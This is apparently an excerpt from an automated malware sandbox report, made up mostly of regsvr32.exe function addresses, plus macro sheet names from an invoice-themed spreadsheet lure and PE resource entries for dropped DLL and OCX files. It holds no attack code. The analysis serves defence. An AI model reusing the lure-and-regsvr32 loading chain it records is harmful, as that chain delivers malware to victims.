                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015F244_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F3284_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002D284_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E1304_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800291344_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800081344_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217384_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AF384_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800221404_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283484_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DB4C4_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014F504_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B3504_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800069544_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F5544_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002975C4_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B5644_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800121684_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135684_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243704_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083704_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800157744_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800123784_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800191784_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800251804_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800019804_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800215884_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A9884_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800181904_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800139944_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026B984_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800289984_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CF9C4_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000359C4_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001EBA04_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800061A04_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135A64_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016DA84_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800059AC4_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D7AC4_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800053B04_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135B44_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001C1B84_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015BB84_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800025B84_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800207BC4_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085BC4_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800015C04_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FFC04_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800295C84_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800229CC4_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E5D44_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A5D84_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800173DC4_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018BDC4_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800261E04_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75219645_2_000007FEF7521964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF752CC385_2_000007FEF752CC38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF75307205_2_000007FEF7530720
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF752FDD05_2_000007FEF752FDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF752C5D85_2_000007FEF752C5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF752EDCC5_2_000007FEF752EDCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF752C9FC5_2_000007FEF752C9FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_001C00005_2_001C0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180005C745_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002ACE85_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000359C5_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E99C5_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800196285_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025A9D5_2_0000000180025A9D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B7B25_2_000000018002B7B2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800094085_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023C145_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064145_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002582C5_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B8345_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000403C5_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800214445_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800120445_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800160545_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001705C5_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800018705_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F8785_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800144845_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800154945_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BC985_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008C9C5_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800078A45_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F0A85_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E4AC5_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800048B05_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ACB45_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800090B45_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800270C05_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800024C05_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800280C85_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800050D45_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800234D85_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800150F05_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800125005_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800241045_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A10C5_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028D105_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800201185_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A5245_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180002D285_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E1305_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800291345_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800081345_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800221405_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800069545_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F5545_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B5645_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800121685_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800135685_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800245705_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800191785_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800251805_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800019805_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800215885_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A9885_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800181905_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800139945_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800289985_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800061A05_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800135A65_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016DA85_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800059AC5_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800135B45_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C1B85_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800025B85_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800085BC5_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800015C05_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800295C85_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800229CC5_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E5D45_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A5D85_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800261E05_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800079EC5_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800236245_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800186285_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017E2C5_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800176385_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180004E3C5_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020E405_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015A645_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800152645_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A26C5_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800076785_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001667C5_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800126805_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001E885_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000968C5_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800222905_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026A905_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000529C5_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020AA05_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180022AAC5_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180007EB45_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800162BC5_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800252C05_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001AEC85_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F6DC5_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800026DC5_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180002ADC5_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E2F45_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016AF45_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000DEF45_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DEFC5_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800063085_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001370C5_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180004B185_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015F245_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180006B245_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F3285_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800217385_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AF385_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800283485_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000DB4C5_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014F505_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B3505_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A7585_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002975C5_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800243705_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800083705_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800157745_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800123785_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026B985_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CF9C5_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001EBA05_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B3A45_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D7AC5_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800053B05_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015BB85_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800207BC5_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FFC05_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800173DC5_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018BDC5_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF91912B09_2_000007FEF91912B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF9195E019_2_000007FEF9195E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF91968509_2_000007FEF9196850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF9195CAD9_2_000007FEF9195CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF91953FB9_2_000007FEF91953FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF919443C9_2_000007FEF919443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000007FEF9194A709_2_000007FEF9194A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_001300009_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180005C749_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002ACE89_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800201189_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000359C9_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E99C9_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800196289_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180025A4C9_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B7B29_2_000000018002B7B2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800094089_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180023C149_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800064149_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002582C9_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000B8349_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000403C9_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800214449_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800120449_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800160549_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001705C9_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800018709_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001F8789_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800144849_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800154949_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BC989_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180008C9C9_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800078A49_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001F0A89_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001E4AC9_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800048B09_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001ACB49_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800090B49_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800270C09_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800024C09_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800280C89_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800050D49_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800234D89_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800150F09_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800125009_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800241049_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A10C9_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180028D109_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A5249_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180002D289_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000E1309_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800291349_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800081349_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800221409_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800069549_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000F5549_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018002B5649_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800121689_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800135689_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800245709_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800191789_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800251809_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800019809_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800215889_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001A9889_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800181909_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800139949_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800289989_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800061A09_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800135A69_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180016DA89_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800059AC9_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800135B49_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018001C1B89_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800025B89_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800085BC9_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800015C09_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800295C89_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9197FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF919BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF919B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D27FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF7521628 appears 214 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeProcess Stats: CPU usage > 98%
                      Source: RechnungsDetails.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: RechnungsDetails.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: F3DOS06hLF1rUq3s6XOB[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F3DOS06hLF1rUq3s6XOB[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F3DOS06hLF1rUq3s6XOB[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F3DOS06hLF1rUq3s6XOB[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F3DOS06hLF1rUq3s6XOB[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: F3DOS06hLF1rUq3s6XOB[1].dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: uxevr2.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: uxevr2.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: uxevr2.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: uxevr2.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: uxevr2.ocx.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
